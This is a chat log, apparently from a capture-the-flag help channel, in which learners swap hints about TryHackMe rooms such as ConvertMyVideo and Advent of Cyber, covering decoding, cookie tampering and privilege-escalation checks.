@static rampart also, you're going in the wrong direction
if you look in the file, that's not b64 data
that's b16 data
Where would a HTTP Auth (basic auth) users creds be stored?
@proven bridge thanks for the hint
@spiral stag means
Hello, I am doing the room convertmyvideo. I managed to gain a shell on the machine, but I am stuck on the privilege escalation part. I looked into the sudo rights with (sudo -l), there was nothing there. I looked into the kernel version and sudo version to see if there is an exploit for their version, nothing there. I then looked at the SUID and GUID binaries, there was nothing of interest. I ran all of the bins that I found suspicious through gtfobins but still no result. I am really stuck, does anyone have an idea into what I could look into next? I am out of ideas :c
@fossil coyote pm me
hello, I'm doing the Advent of Cyber challenge, im at task 6 and i managed to get the cookie, decode it but im stuck, i dont understand how to use that cookie info to access mcinventory account
and see what he requested
i tried using the Burp Suite but i cant manage to make it work
i also tried to edit the cookie
or intercepting the data
oh shit i made it
im a god
it took me about 5 hours
that one second of clearness was just beautiful
goddamn this feels so good
PogChamp nice one @snow drift !
thanksss
@echo thunder what did you find so far ? Give some idea to where you are. Just asking for help out in the blue is a bit difficult to answer.
I feel like a need a nudge on "Tempus Fugit Durius" as well. Been stuck for a really long time now, trying to get flag #2.
@tranquil dagger do you have root?
@tranquil dagger https://gtfobins.github.io/
look at that
No, I don't have root. Been going in circles for what seems like an eternity.
Thanks, will have a look
so what user do you have now? put in spoiler tags
||benclower||